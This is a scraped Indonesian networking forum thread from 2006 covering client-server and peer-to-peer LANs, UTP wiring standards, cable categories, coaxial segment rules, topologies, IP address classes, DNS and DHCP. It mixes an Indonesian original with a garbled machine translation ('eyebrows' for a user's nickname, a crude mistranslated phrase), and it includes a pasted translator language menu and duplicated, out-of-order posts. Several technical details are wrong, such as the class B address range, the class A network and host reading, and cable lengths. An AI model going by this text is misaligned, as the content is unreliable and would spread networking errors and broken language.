secara khusus oleh satu komputer (server) yang tidak dibebani dengan tugas lain sebagai
workstation.
2. Sistem keamanan dan administrasi jaringan lebih baik, karena terdapat seorang pemakai yang
bertugas sebagai administrator jaringan, yang mengelola administrasi dan sistem keamanan
jaringan.
3. Sistem backup data lebih baik, karena pada jaringan client-server backup dilakukan terpusat di
server, yang akan membackup seluruh data yang digunakan di dalam jaringan.

Kelemahan
1. Biaya operasional relatif lebih mahal.
2. Diperlukan adanya satu komputer khusus yang berkemampuan lebih untuk ditugaskan
sebagai server.
3. Kelangsungan jaringan sangat tergantung pada server. Bila server mengalami gangguan maka
secara keseluruhan jaringan akan terganggu.

2. Jaringan Peer To Peer


--------------------------
Bila ditinjau dari peran server di kedua tipe jaringan tersebut, maka server di jaringan tipe peer to
peer diistilahkan non-dedicated server, karena server tidak berperan sebagai server murni melainkan
sekaligus dapat berperan sebagai workstation. (lha?)

Keunggulan
1. Antar komputer dalam jaringan dapat saling berbagi-pakai fasilitas yang dimilikinya
seperti:harddisk, drive, fax/modem, printer.
2. Biaya operasional relatif lebih murah dibandingkan dengan tipe jaringan client-server, salah
satunya karena tidak memerlukan adanya server yang memiliki kemampuan khusus untuk
mengorganisasikan dan menyediakan fasilitas jaringan.
3. Kelangsungan kerja jaringan tidak tergantung pada satu server. Sehingga bila salah satu
komputer/peer mati atau rusak, jaringan secara keseluruhan tidak akan mengalami gangguan.

Kelemahan
1. Troubleshooting jaringan relatif lebih sulit, karena pada jaringan tipe peer to peer setiap
komputer dimungkinkan untuk terlibat dalam komunikasi yang ada. Di jaringan client-server,
komunikasi adalah antara server dengan workstation.
2. Unjuk kerja lebih rendah dibandingkan dengan jaringan client-server, karena setiap
komputer/peer disamping harus mengelola pemakaian fasilitas jaringan juga harus mengelola
pekerjaan atau aplikasi sendiri.
3. Sistem keamanan jaringan ditentukan oleh masing-masing user dengan mengatur keamanan
masing-masing fasilitas yang dimiliki.
4. Karena data jaringan tersebar di masing-masing komputer dalam jaringan, maka backup harus
dilakukan oleh masing-masing komputer tersebut.

(capek euy, mending copy aja ya?)

nah, itu sekilas tentang LAN, karena udah kebanyakan, biar gak bosen, kita udahin dulu, ntar kita
bahas tentang protokol2nya dan hardware lain yang mendukung LAN itu serta request dari teman2..

("_")

sesekali bikin workshop donk...........


__________________
"Tidak Ada Kekayaan Melebihi Akal"
"Tidak Ada Kemiskinan Melebihi Kebodohan"
"Tidak Ada Warisan Melebihi Budi Pekerti"
"Tidak Ada Penolong Melebihi Konsultasi"

Email :Muammarsubki@yahoo.com

Website : http://www.subki.orgfree.com

c4m4r2006
View Public Profile
Send a private message to c4m4r2006
Find More Posts by c4m4r2006

12-23-2006, 11:28 PM #18


jurnalis jh
Imum Mukim

Join Date: Nov 2006


Location: d/h AlisBandung
Posts: 2,246
Thanks: 3
Thanked 18 Times in 9 Posts

--------------------------------------------------------------------------------

wah workshop? alis di bandung nih


__________________
Kuasai Dunia dengan Informasi

My Blog
My Friendster
My Facebook

jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh

12-27-2006, 02:50 PM #19


muiz
Peutua
Join Date: Dec 2006
Posts: 752
Thanks: 0
Thanked 5 Times in 2 Posts

--------------------------------------------------------------------------------

Quote:
Originally Posted by AlisBandung
---------------------

jadi gini, kabel UTP (ada 8 kabel warna-warni) itu kan punya standard, agar di setiap negara yang
memakainya pnya keseragaman dalam implementasinya, nah sampai saat alis mengenal UTP, ada 2
standar yag dipakai, yaitu:

1. Standard T568-A

Pin warna
--------------------
1 putih dan hijo
2 hijo
3 putih orange
4 Biru
5 putih dan biru
6 Orange
7 putih dan coklat
8 coklat

2. Standard T568-B

Pin warna
--------------------
1 putih dan orange
2 Orange
3 putih dan hijo
4 Biru
5 putih dan biru
6 hijo
7 putih dan coklat
8 coklat

2 standard itu ntar terpakai pada saat kabel digunakan untuk straight, rollover atau crossover, gini
penjelasannya:

Straight-Through
=================
Jenis kabel ini digunakan untuk menghubungkan antara workstation dengan hub/switch. Kabel ini
juga memiliki 4 pairs (8 wire) dimana setiap pin antara ujung satu dengan ujung lainnya harus
sama. Maksudnya, bila salah satu ujung memakai standard T568-A maka ujung satunya harus
memakai T568-A juga. Begitu pula sebaliknya, jika salah satu ujung menggunakan standard T568-
B, ujung satunya juga harus memakai standard yang sama.

Rollover
========
Digunakan untuk koneksi antara sebuah workstation ke port console pada sebuah router atau switch.
Standard yang digunakan adalah T568-A pada salah satu ujung dan
ujung lainnya urutan T568-A tinggal di roll (dibalik). Demikian juga jika yang dipakai

Terjemahkan dari: Bahasa IndonesiaInggris—Deteksi bahasa—AfrikaansAlbaniaArabBahasa


IndonesiaBelandaBulgarByelorusiaCekDanskEstiFarsiGalisiaHindiIbraniInggrisIrlandiaIslanItaliaJ
epangJermanKatalanaKoreaKreol Haiti
ALPHAKroatLatviLituaviMagyarMakedoniaMaltaMandarinMelayuNorskPilipinoPolskiPortugisPr
ancisRumaniaRusiaSerbSlovenSlowakiaSpanyolSuomiSwahiliSwenskThaiTurkiUkrainaVietnamW
alesYiddiYunani
Terjemahkan ke: InggrisBahasa Indonesia—AfrikaansAlbaniaArabBahasa
IndonesiaBelandaBulgarByelorusiaCekDanskEstiFarsiGalisiaHindiIbraniInggrisIrlandiaIslanItaliaJ
epangJermanKatalanaKoreaKreol Haiti
ALPHAKroatLatviLituaviMagyarMakedoniaMaltaMandarin (Aks. Sederhana)Mandarin (Aks.
Tradisional)MelayuNorskPilipinoPolskiPortugisPrancisRumaniaRusiaSerbSlovenSlowakiaSpanyol
SuomiSwahiliSwenskThaiTurkiUkrainaVietnamWalesYiddiYunani

Terjemahan Bahasa Indonesia ke InggrisTunjukkan huruf latin


ya learn all about networking, and not let this topic quiet, mending his eyebrows writing about
networking aja deh, kalo mau said, posting aja, kalo kalo be answered can not thank there is another
friend who ngejawab

not really know where ya from nGoMongNya, but since this thread dimulail with cable, our cables
bahs little about it .. maap kalo udah boring for the tau, a pretty, for, for science to not know

cable
=====
talk about the network, would not his name off of the cable, although now its time udah wireless,
but cable will be the lesson material may not be forgotten by the network equipment, wireless now
anyway still hold to the teaching (emang silat?) wired, for example, optical etc. lah

principles still work light, cable ngubungin one side with the other side of the terminator in masing2
end, but this relationship did not lead to a closed relationship between the 2-sided, can be set to
open 2 connections with the other side

now you've advanced age, so the cable topology is also growing, from the telegraph era technology
that make up its time radio and optical fiber lasers.

cable types nih


===================
Each type of cable has the ability and different specifications, hence the introduction was made the
type of cable.
There are two types of cables are generally known, namely:
1. twisted pair: UTP (unshielded twisted pair) and STP (shielded twisted pair) 2. coaxial cable.
Categories for the twisted pair:

Cable: CAT Type 1


type: UTP
features: analog (typically used in telephone device in general and the ISDN lines, and integrated-
services digital networks. Also, to connect the modem to the telephone line).

Cable: CAT Type 2


type: UTP
features: up to 1 Mbits (often used in token ring topology)

Cable: Type CAT 3


type: UTP / STP
features: 16 Mbits of data transfer (often used in token ring topology or
10BaseT)

Cable: Type CAT 4


type: UTP, STP
features: 20 Mbits of data transfer (typically used on token ring topology)

Cable: Type CAT 5


type: UTP, STP
features: up to 100 MH. 100 Mbits of data transfer / 22 db

Cable: Type CAT 5enhanced


type: UTP, STP
features: up to 100 MHz.1 Gigabit Ethernet up to 100 meters - 4 copper
pairs (two types of CAT5 often used in token ring topology 16Mbps, 10Mbps Ethernet or
FastEthernet 100Mbps)

Cable: Type CAT 6


type: UTP, STP
features: up to 155 MHz or 250 MHz. 2.5 Gigabit Ethernet up to 100 meters or 10
Gbit / s up to 25 meters. 20.2 db (Gigabit Ethernet)

Cable: Type CAT 7


type: UTP, STP
features: up to 200 MHz or 700 MHz Giga-Ethernet / 20.8 db (Gigabit Ethernet)

This type of cable, not to memorize his eyebrows too lho ... ngambilnya from:
http://www.glossary-tech.com/cable.htm and http://www.firewall.cx/cabling_utp.php

Giving 1/2/3/4/5/6 category is the category specifications for each copper cable and also for jack.
Each is a series of revisions for the quality of cable, quality cable wrap (insulation) and also for the
quality of "entanglement" (twist) of each pair of wires. In addition, to determine the frequency scale
can pass on the cable facilities, and also the quality of insulation that can reduce the induction effect
between the wires (noise can be suppressed in such a way ).------> physics banget tuh

Keep in mind also (ingak.. Ingak), the specification between CAT5 and CAT5 has enchanced the
same industry standard, but the CAT5e already equipped with insulation to reduce the effects of
induction or electromagnetic interference. CAT5e cable can be used to connect the network to
1Gbps speed. (bokkkkkk giga buset. .1)

As for coaxial cable, there are two types, namely

1. thick coaxial cable (has a fairly large diameter)


Coaxial cable of this type is specified by IEEE 802.3 10BASE5, where the cable has an average
diameter of 12mm, and is usually given a yellow color; this type of cable is commonly referred to
as a standard ethernet or thick Ethernet, or simply abbreviated thicknet, or even mentioned cuman
as a yellow cable.

This Coaxial cable (RG-6) when used in the specification and the network has the following rules:
* Each end should be terminated with 50-ohm terminator (terminator is recommended to use
already assembled, instead of using one 50-ohm resistors 1 watt, for dissipative voltage resistors
have a fairly wide, experts kalo, can critical nih).
* Maximum of 3 segments with the connected equipment (attached devices) or a populated
segments.
* Every network card has an additional transmitter (external transceiver).
* Each segment contains a maximum of 100 network devices, including repeaters in this case.
* Maximum cable length per segment is 1640 feet (or about 500 meters).
* Maximum distance between the segment is 4920 feet (or about 1500 meters).
* Each segment must be grounded.
* Rarely maximum of tap or pencabang from the main cable to the device (device) is 16 feet (about
5 meters).
* The minimum inter-tap Jaral is 8 feet (about 2.5 meters).

2. Thin coaxial cable (Coaxial cable "Skinny")


This type of coaxial cable widely used in amateur radio circles, especially for transceivers that do
not require a large power output. To be used as a network device, this type coaxial cable must meet
IEEE 802.3 10BASE2, where the average diameter ranges from 5mm and
usually black or other dark colors. Each device (device) is connected with BNC T-connector. This
type of cable is also known as Thin Ethernet or thinnet.
This type of coaxial cable, such as the type RG-58 A / U or C / U, if implemented with TConnector
and terminator in a network, must follow the following rules:
* Each end of the cable rated 50-ohm terminator.
* The maximum length of cable is 1.000 feet (185 meters) per segment.
* Each segment maximum of 30 devices connected to the network (devices)
* Network card is using the onboard transceiver, do not need additional transceiver, except for the
repeater.
* Maximum is 3 segments connected to each other (populated segments).
* Each segment should be equipped with a ground.
* The minimum length between the T-Connector is 1.5 feet (0.5 meters).
* Maximum cable length in one segment is 1.818 feet (555 meters).
* Each segment has a maximum of 30 devices connected.

Thus glimpse of the cable and tipe2nya


many and the reply was talking about cable, but since his udah sore, and stiff neck've, we went on a
day or two yes

This type of cable, not to memorize his eyebrows too lho ... ngambilnya from:
http://www.glossary-tech.com/cable.htm and http://www.firewall.cx/cabling_utp.php
with English lessons capital, hhe ..
we will ngebahas ntar network topology which is a "work program" of the cable itself

hopefully helpful
__________________
Master the world with information

My Blog
My Friendster
My Facebook

journalists jh
View Public Profile
Send a private message to journalists jh
Find More Posts by journalists jh

12-12-2006, 01:31 pm # 3
journalists jh
Imum Mukim

Join Date: Nov 2006


Location: d / h AlisBandung
Posts: 2.246
Thanks: 3
Thanked 18 Times in 9 Posts

-------------------------------------------------- ------------------------------

network topology
=================

enter the next chapter nih, hhe (sok jago)

determination of network topology will determine the type of cable we will pake, and vice versa,
the availability of cable and have gocek yangkita, a mind dong to build a network (for the future we
call the network, let cool)

actually, loads of network topology, but we often hear that only 3 doang, and that many were also
based on the 3, only the perpetrator kadang2 modify slightly depending on network conditions, eg
area, length of cord, etc.

three of them who wrote it:

1. ring topology
This topology Manfaatin closed curve, meaning information and data as well as distributed in such
traffic
way that to each node. These facilities generally use optical fiber as a facility
(although some are using twisted pair).
(bahasannya above)

2. linear bus topology


Linear bus topology is a topology widely used in the mushrooming use of Coaxial cable. By using
the T-Connector (with a 50ohm terminator on the end of the network), then the computer or other
network devices can be easily connected to each other.
The main difficulty of using coaxial cables is difficult to measure whether the coaxial cable that is
used completely matching or not. Because that was really not properly measured will damage the
NIC (network interface card) that is used and the network performance becomes constrained, not
reaching maximum capacity. This topology is also frequently used on networks with fiber optic
base (which later merged with a star topology to connect
with the client or node).

3. star topology
Network topology is widely used in various places, because of the ease to add, reduce or detect
existing tissue damage. In addition, cable length issues that must be appropriate (matching) also did
not become an important anymore. Just from there hub (which is still wrong of course) then it could
be terhubunglah some computers and network resources easily.
Armed with crimtool, UTP cable (CAT5 usually) and the connector, one easily create a network
system. Of course there are some losses due to cable length (loss effect) or due to conduction law,
but most can say all that can be ignored.

Third exposure topology above only as an introduction. The point is that a network can be
is a combination of two or three topologies above. For example, there is a call tree topology,
where this topology is a combination or combinations of the three existing topology.

It briefly about the network topology, in fact better kalo pictures, but my eyebrows are still
confused, how ya how to upload pictures in posts?
__________________
Master the world with information

My Blog
My Friendster
My Facebook

journalists jh
View Public Profile
Send a private message to journalists jh
Find More Posts by journalists jh

12-12-2006, 01:41 pm # 4
ihan_sunrise
Contributor

Join Date: Apr 2006


Location: State of the Shari'a
Posts: 2,210
Thanks: 0
Thanked 25 Times in 10 Posts

-------------------------------------------------- ------------------------------

ups load images from photobucket first to write a new ..... then enter here ... I think once dah ad
description, cuman ihan forgot what thread
__________________
My love has embraced
and I was relieved to be held
has attracted miss my
and I'm glad he's not letting me

Ihan Sunrise
http://ihansunrise.blogspot.com/

ihan_sunrise
View Public Profile
Send a private message to ihan_sunrise
Visit ihan_sunrise's homepage!
Find More Posts by ihan_sunrise

12-12-2006, 05:09 PM # 5
baiquni
Peutua

Join Date: Mar 2006


Location: banda aceh
Posts: 571
Thanks: 0
Thanked 10 Times in 5 Posts

-------------------------------------------------- ------------------------------

makasih ya brow ... eyebrows share knowledge may be useful for us all amien.

Eyebrows ... gi doing?


__________________
One heart ... One guess ... Supposedly!

My Blogs: http://www.baiquni.net/
My Wordpress: http://baiquni.wordpress.com/
My Friendster: http://www.friendster.com/mbaiquni
My Bussiness: http://www.ipulsa.net/
baiquni
View Public Profile
Send a private message to baiquni
Visit baiquni's homepage!
Find More Posts by baiquni

12-15-2006, 12:58 PM # 6
journalists jh
Imum Mukim

Join Date: Nov 2006


Location: d / h AlisBandung
Posts: 2.246
Thanks: 3
Thanked 18 Times in 9 Posts

-------------------------------------------------- ------------------------------

Quote:
Originally Posted by baiquni
makasih ya brow ... eyebrows share knowledge may be useful for us all amien.

Eyebrows ... gi doing?

amen ... eyebrows not think there is a response, hhe ..


ntar we start again with the LAN ... but now again searching first bahan2 TA, tomorrow it in
another connection
__________________
Master the world with information

My Blog
My Friendster
My Facebook

journalists jh
View Public Profile
Send a private message to journalists jh
Find More Posts by journalists jh

12-15-2006, 01:32 PM # 7
sHinOsuke
Super Moderator
Join Date: Feb 2006
Posts: 1.363
Thanks: 16
Thanked 47 Times in 14 Posts

-------------------------------------------------- ------------------------------

uh if you want to make anything WLAN aja ya devices in need


__________________
Blogs Fadli MySQL Database Free Article

sHinOsuke
View Public Profile
Send a private message to sHinOsuke
Find More Posts by sHinOsuke

12-15-2006, 03:33 PM # 8
aloysurf
Photographer

Join Date: Nov 2006


Location: On The Beach
Posts: 1.942
Thanks: 8
Thanked 4 Times in 4 Posts

-------------------------------------------------- ------------------------------

Quote:
Originally Posted by AlisBandung
It briefly about the network topology, in fact better kalo pictures, but my eyebrows are still
confused, how ya how to upload pictures in posts?

Let's see here http://acehforum.or.id/showthread.php?t=2740


Hopefully have the pleasure ...

Regard

aloysurf
View Public Profile
Send a private message to aloysurf
Visit aloysurf's homepage!
Find More Posts by aloysurf

12-17-2006, 11:22 PM # 9
Muiz
Peutua
Join Date: Dec 2006
Posts: 752
Thanks: 0
Thanked 5 Times in 2 Posts

-------------------------------------------------- ------------------------------

Quote:
Originally Posted by AlisBandung
amen ... eyebrows not think there is a response, hhe ..
ntar we start again with the LAN ... but now again searching first bahan2 TA, tomorrow it in
another connection

ow .. steadily busy flying again instead of TA could bagi2 .. oya solid science to the way it pairs
UTP cable plus a bit of donk bang,,, let me steady ... all the way for the router pc in Indonesian ... ya
bang ... sep ... steady brow bang create ..

Muiz
View Public Profile
Send a private message to Muiz
Find More Posts by Muiz

12-18-2006, 05:29 PM # 10
Acheh
Geuchik

Join Date: Feb 2006


Location: Earth God
Posts: 996
Thanks: 31
Thanked 14 Times in 4 Posts

-------------------------------------------------- ------------------------------

This thread more sip klo accompanied by pictures ..


eg coaxial cable, nah .. gmn coaxialnya image gtu ...

Acheh
View Public Profile
Send a private message to Acheh
Find More Posts by Tsunami

12-18-2006, 09:24 PM # 11
journalists jh
Imum Mukim

Join Date: Nov 2006


Location: d / h AlisBandung
Posts: 2.246
Thanks: 3
Thanked 18 Times in 9 Posts

-------------------------------------------------- ------------------------------

@ Acheh
it bothered ya make nambahin picture here, so males are also euy .. hhe

@ Muiz
pc router and installing UTP ya ...
tomorrow we continued ya ...

@ Shinosuke
sip deh, but before the WLAN, we'll eat it aja dulu ya ..

continued much ....

yesterday we've ngebahas ama topologinya cable, now we'll discuss one implementation, the LAN

ni era as the development, we not only know doang LAN, but now there've WLAN, Wireless LANs
ie, the wireless LAN (simplenya so).

Local Area Network (LAN) is the number of computers that are connected together in one
particular area that is not so large, as in an office or building.

In communications, there are two types of network or LAN, a network of Peer to Peer and Client-
Server networks.

In peer to peer network, every computer connected to the network can act both as a workstation or
server. Whereas the client-server networks, only one computer that served as servers and other
computers acting as workstations. Between the two types of networks
these each have advantages and weaknesses, we'll discuss ntar lebuh far

outlined, LAN was supported by 2 main components, namely:


1. Physical Kompenen as a PC, the NIC (Network Interface Card), cable and topologinya
2. Kompenen software like the operating system, Network Adapter Driver and network protocols
themselves

fuck the hell tu lis?


let's discuss satu2 aja ..
PC
dear, gak banget deh discuss our problems pake PC today, but we will discuss a working PC in the
network aja.
Type personal computers used in the network will greatly determine the performance of the
network. Computers with high performance will be able to send and access data in the network
quickly.
Tissue type in the Client-Server, a computer that functioned as an absolute server must have a
performance higher than the computers
others as his workstation, because the server will be responsible for providing facilities and
managing the network operations

NIC
Based on the type of buses, there are several types of network interface card (nic) or network card,
which is the ISA and PCI.
We have kind of network cards that are widely used, the PCI
for more details, see aja LAN Card-Sodara Sodara home .. not on board like a brow, hhe ..

cable and network topology


aja look at previous posts

NAD
instead we Naggroe ya, but Network Adapter Card. Each network card will have a driver or
program that serves to activate and configure the network adapter is adapted to the environment in
which network cards are installed to be used for data communication.

operating systems
OS here is not like Windows and Linux, but OS peer to peer and Client / Server. discussed satu2 ...

1. Client-Server Network
-------------------------
Servers are computers that provide facilities for other computers in the network and client are the
computers that receive or use the facilities provided by the server. Dijaringan Server client-server
type is called the Dedicated Server for purely acting as servers that provide facilities to workstations
and servers can not serve as workstation.

Advantages
1. Higher access speeds due to the provision of network facilities and management carried out
exclusively by a single computer (server) that is not burdened with other tasks as a workstation.
2. Security systems and network administration is better, because there was a user who served as a
network administrator, who manages the administration and security systems
network.
3. Data backup system is better, because on a client-server network is centered on the backup server,
which will backup all the data used in the network.

Weakness
1. Operational costs are relatively more expensive.
2. Required a special computer that is more capable for the assigned
as a server.
3. Continuity of the network depends on the server. If the server is susceptible to interference, then
the whole network will be disrupted.
2. Peer To Peer Network
--------------------------
When viewed from the role of both types of servers in the network, the network server in a peer to
peer type is termed non-dedicated server, because the server does not act as a pure server but at the
same time can serve as workstation. (lha?)

Advantages
1. Between computers in a network can share each owned facilities such as: hard disk, drive, fax /
modem, printer.
2. Operational costs are relatively cheap compared to the type of client-server network, one
only because it does not require any server that has a special ability to organize and provide
network facilities.
3. Continuity of the network work does not depend on a single server. So that if one computer / peer
dead or damaged, the entire network will not be susceptible to interference.

Weakness
1. Network troubleshooting is relatively more difficult, because the network of peer to peer type of
each computer it is possible to engage in communication that exists. In client-server network, the
communication is between the server with the workstation.
2. Lower performance compared to client-server network, because every computer / peer in addition
to managing the use of network facilities also need to manage their own job or application.
3. Network security system is determined by each user to manage the security of each facility
owned.
4. Because the network data is spread on each computer in the network, the backups should be
performed by each computer.

(tired euy, mending copies aja ya?)

nah, it was a glimpse of the LAN, because've most, let me not bored, we udahin first, we discuss
about the ntar protokol2nya and other hardware that supports LAN and teman2 request ..

("_")
__________________
Master the world with information

My Blog
My Friendster
My Facebook

journalists jh
View Public Profile
Send a private message to journalists jh
Find More Posts by journalists jh

12-18-2006, 07:28 PM # 12
Muiz
Peutua

Join Date: Dec 2006


Posts: 752
Thanks: 0
Thanked 5 Times in 2 Posts

-------------------------------------------------- ------------------------------

Quote:
Originally Posted by Acheh
This thread more sip klo accompanied by pictures ..
eg coaxial cable, nah .. gmn coaxialnya image gtu ...

yup .. pake clearer picture added .. rame .. n eager learner makasi ...

Muiz
View Public Profile
Send a private message to Muiz
Find More Posts by Muiz

12-18-2006, 07:56 PM # 13
Muiz
Peutua

Join Date: Dec 2006


Posts: 752
Thanks: 0
Thanked 5 Times in 2 Posts

-------------------------------------------------- ------------------------------

sep bang brow

Muiz
View Public Profile
Send a private message to Muiz
Find More Posts by Muiz

12-20-2006, 11:33 PM # 14
journalists jh
Imum Mukim

Join Date: Nov 2006


Location: d / h AlisBandung
Posts: 2.246
Thanks: 3
Thanked 18 Times in 9 Posts

how to installing UTP cable

-------------------------------------------------- ------------------------------

---------------------

jadi gini, UTP cable (there are 8 colored wires) that do have standards, so that in each country that
use uniformity in the implementation pnya, well until now known UTP eyebrows, there used 2 yag
standards, namely:

1. Standard T568-A

Pin Color
--------------------
White and 1 hijo
2 hijo
3 white-orange
4 Blue
5 white and blue
6 Orange
7 white and brown
8 brown

2. T568-B standard

Pin Color
--------------------
White and 1 orange
2 Orange
3 white and hijo
4 Blue
5 white and blue
6 hijo
7 white and brown
8 brown

Ntar 2 standard is used when the cable is used for straight, rollover, or crossover, gini explanation:

Straight-Through
=================
This type of cable used to connect the workstation with the hub / switch. This cable also has 4 pairs
(8 wire) where each pin between the one end with the other end must be the same. That is, if one
end using a standard T568-A will end only had to wear T568-A as well. And vice versa, if one end
using a standard T568-B, the other end must also use the same standard.

Rollover
========
Used for connection between a workstation to the console port on a router or switch. Standard used
is T568-A on one end and
the other end of the sequence T568-A stay in roll (reversed). Likewise, if the use is T568-B
standard.

Crossover
===========
Is a type of cable used to connect between workstations or between the hub / switch. This type of
cable using standard T568-A at one end, and T568-B on the other end.

There are little ways masangnya:

1. Cable manufacture
a) Prepare the UTP cable and RJ 45 as the interface
b) Cut the end of the cable jacket approximately 1.5 cm with a craft knife or scissors, and remove
the jacket. Be careful in peeling the jacket, do not get cable in it come truncated.
c) or open loops Untwist each pair cable
d) To create a straight-Trough cable, crossover or rollover, see the standard T568-A or T568-B
e) Match each type of cable with standardnya, then point to allow to be inserted into the RJ 45
f) When you've put into RJ 45, crimpinglah by using existing equipment in order to become
permanent and the cable is not easily shaken
g) Check the cord first before dicrimping sequence, because the cable is already dicrimping no
longer be revoked. This means that if we are wrong sort spouse or insert it into the RJ 45 or less
perfect, most likely the cable can not be used

2. Test cable
a) Cables that have been dicrimping fault can be detected using a cable tester (eg: Fluke 620 LSN
CableMeter)
b) If there is no cable tester, attach the cable from the NIC to the hub (if the type of straight-
through) and inter-workstation if the cord is kind of crossover.
c) Pekailah ping command to test the cable. If the connection can be formed, means making your
cables are correct. Conversely, if the connection can not be formed, means that there are mistakes in
the cabling process.

hopefully helpful
__________________
Master the world with information

My Blog
My Friendster
My Facebook

journalists jh
View Public Profile
Send a private message to journalists jh
Find More Posts by journalists jh

12-20-2006, 11:37 PM # 15
journalists jh
Imum Mukim
Join Date: Nov 2006
Location: d / h AlisBandung
Posts: 2.246
Thanks: 3
Thanked 18 Times in 9 Posts

-------------------------------------------------- ------------------------------

TCP / IP
===============
Because an important role in the Windows operating system and also because the TCP / IP
a protocol option (default) from Windows. TCP is the Transport layer of the OSI model (Open
Systems Interconnection), while the IP is the Network layer of the OSI mode

IP Address
----------
IP address is the address given on computer networks and network equipment
using TCP / IP. IP addresses consist of 32-bit binary numbers that can be written as four groups of
decimal numbers separated by a dot such as 192.168.0.1.

+-------------------+-----------+
| Network ID | Host ID |
+-----+------+------+-----------+
| 192 | 168 | 0 | 1 |
+-----+------+------+-----------+

IP addresses consist of two parts of the network ID and host ID, where the network ID to determine
the network address of the computer, while the host ID to determine the host address (computers,
routers, switches).

Therefore the IP address provides the full address of a host and network address where the host is
located.

Class-class IP Address
------------------------
To facilitate the use, depending on the needs of users, IP addresses are divided into three classes as
shown below

------+------------+---------------+-------------- ------+
Classes | Network ID Host ID | Default Subnet Mask |
------+-------------+---------------+------------- -------+
A | xxx.0.0.1 | xxx.255.255.254 | 255.0.0.0 |
B | xxx.xxx.0.1 | xxx.xxx.255.254 | 255.255.0.0 |
C | xxx.xxx.xxx.1 | xxx.xxx.xxx.254 | 255.255.255.0 |
------+-------------+---------------+------------- -------+

IP address assigned to class A network with a number of very large hosts.


1.xxx.xxx.xxx IP range. - 126.xxx.xxx.xxx, there are 16,777,214 (16 million) IP address on each
class A.
IP address assigned to class A network with a number of very large hosts. In the IP address
class A network ID is the first 8 bits, while the host ID is 24 bits.
Thus, how to read the IP address class A, for example, 113.46.5.6 is:
Network ID = 113
Host ID = 46.5.6
So the IP address above is hosted on a network 46.5.6 number 113 number.

Class B IP address is usually allocated to the network medium and large. In class B IP address,
network ID is the first 16 bits, while the host ID is 16 bits. Thus, how to read a class B IP address,
such as 132.92.121.1
Network ID = 132.92
Host ID = 121.1
So the IP address on the mean number 121.1 on the host network number 132.92. with a length of
16-bit host ID, network with the IP address class B can accommodate about 65,000 hosts. Range IP
128.0.xxx.xxx - 191.155.xxx.xxx

Class C IP address originally used for small networks (LAN). Host ID is the last 8 bits. With this
configuration, can be formed about 2 million networks with each network has 256 IP addresses.
Range IP 192.0.0.xxx - 223.255.255.x.
The allocation of IP address is basically the process of selecting the network ID and host ID is right
for a network. Right or not this configuration depends on the objectives to be achieved, which
allocates IP addresses as efficiently as possible.

Domain Name System (DNS)


-------------------------
Domain Name System (DNS) is a system that allows the name of a host on a computer network or
the Internet translated into IP addresses. In giving the name, DNS uses a hierarchy architecture.

1. Root-level domain: the top level is displayed as a dot (.).


2. Top level domain: category code or state organizations such as:. Com for use by
company;. edu for use by the college;. gov for use by government agencies. In addition to
distinguish between the use of the name by a country with
Other countries use such marks. id to Indonesia or. au for Australia.
3. Second level domain: the name for the organization or company, for example:
microsoft.com; yahoo.com, and others.

DHCP (Dynamic Host Configuration Protocol)


-------------------------------------------
IP address and subnet mask can be provided automatically using Dynamic Host Configuration
Protocol or conditions manually.
DHCP function to provide IP address automatically on computers that use TCP / IP. DHCP works
with the client-server relationship, where the DHCP server provides a group of IP addresses that can
be given to the DHCP client. In providing this IP address, DHCP IP address only to lend it. So
giving this place an IP address dynamically.

Network topology is the physical description of the pattern of relationships between network
components, including servers, workstations, hubs and pengkabelannnya. There are three kinds of
commonly used network topology, ie Bus, Star and Ring.
__________________
Master the world with information

My Blog
My Friendster
My Facebook

journalists jh
View Public Profile
Send a private message to journalists jh
Find More Posts by journalists jh

12-20-2006, 11:38 PM # 16
journalists jh
Imum Mukim

Join Date: Nov 2006


Location: d / h AlisBandung
Posts: 2.246
Thanks: 3
Thanked 18 Times in 9 Posts

-------------------------------------------------- ------------------------------

for wlan .....


dibutuhin what it is?
kalo gak salah sih eyebrows just need access point aja.
reply to the laptop's wireless udah ada tuh link, lived in a laptop configuration aja, kalo in ordinary
companies, buying used pointnya access to catch the wave, and for all, connect the access point to a
computer with a normal LAN cable ... from the AP to the Company should pake cable, because the
Company have not got a laptop .. wirelesslink such that the brow know ... maybe there is more tau
teman2 .. hhe
__________________
Master the world with information

My Blog
My Friendster
My Facebook

journalists jh
View Public Profile
Send a private message to journalists jh
Find More Posts by journalists jh

12-22-2006, 07:43 pm # 17
c4m4r2006
kawoem

Join Date: Apr 2006


Location: Jakarta
Posts: 166
Thanks: 0
Thanked 14 Times in 7 Posts

-------------------------------------------------- ------------------------------

Quote:
Originally Posted by AlisBandung
@ Acheh
it bothered ya make nambahin picture here, so males are also euy .. hhe

@ Muiz
pc router and installing UTP ya ...
tomorrow we continued ya ...

@ Shinosuke
sip deh, but before the WLAN, we'll eat it aja dulu ya ..

continued much ....

yesterday we've ngebahas ama topologinya cable, now we'll discuss one implementation, the LAN

ni era as the development, we not only know doang LAN, but now there've WLAN, Wireless LANs
ie, the wireless LAN (simplenya so).

Local Area Network (LAN) is the number of computers that are connected together in one
particular area that is not so large, as in an office or building.

In communications, there are two types of network or LAN, a network of Peer to Peer and Client-
Server networks.

In peer to peer network, every computer connected to the network can act both as a workstation or
server. Whereas the client-server networks, only one computer that served as servers and other
computers acting as workstations. Between the two types of networks
these each have advantages and weaknesses, we'll discuss ntar lebuh far

outlined, LAN was supported by 2 main components, namely:


1. Physical Kompenen as a PC, the NIC (Network Interface Card), cable and topologinya
2. Kompenen software like the operating system, Network Adapter Driver and network protocols
themselves

fuck the hell tu lis?


let's discuss satu2 aja ..
PC
dear, gak banget deh discuss our problems pake PC today, but we will discuss a working PC in the
network aja.
Type personal computers used in the network will greatly determine the performance of the
network. Computers with high performance will be able to send and access data in the network
quickly.
Tissue type in the Client-Server, a computer that functioned as an absolute server must have a
performance higher than the computers
others as his workstation, because the server will be responsible for providing facilities and
managing the network operations

NIC
Based on the type of buses, there are several types of network interface card (nic) or network card,
which is the ISA and PCI.
We have kind of network cards that are widely used, the PCI
for more details, see aja LAN Card-Sodara Sodara home .. not on board like a brow, hhe ..

cable and network topology


aja look at previous posts

NAD
instead we Naggroe ya, but Network Adapter Card. Each network card will have a driver or
program that serves to activate and configure the network adapter is adapted to the environment in
which network cards are installed to be used for data communication.

operating systems
OS here is not like Windows and Linux, but OS peer to peer and Client / Server. discussed satu2 ...

1. Client-Server Network
-------------------------
Servers are computers that provide facilities for other computers in the network and client are the
computers that receive or use the facilities provided by the server. Dijaringan Server client-server
type is called the Dedicated Server for purely acting as servers that provide facilities to workstations
and servers can not serve as workstation.

Advantages
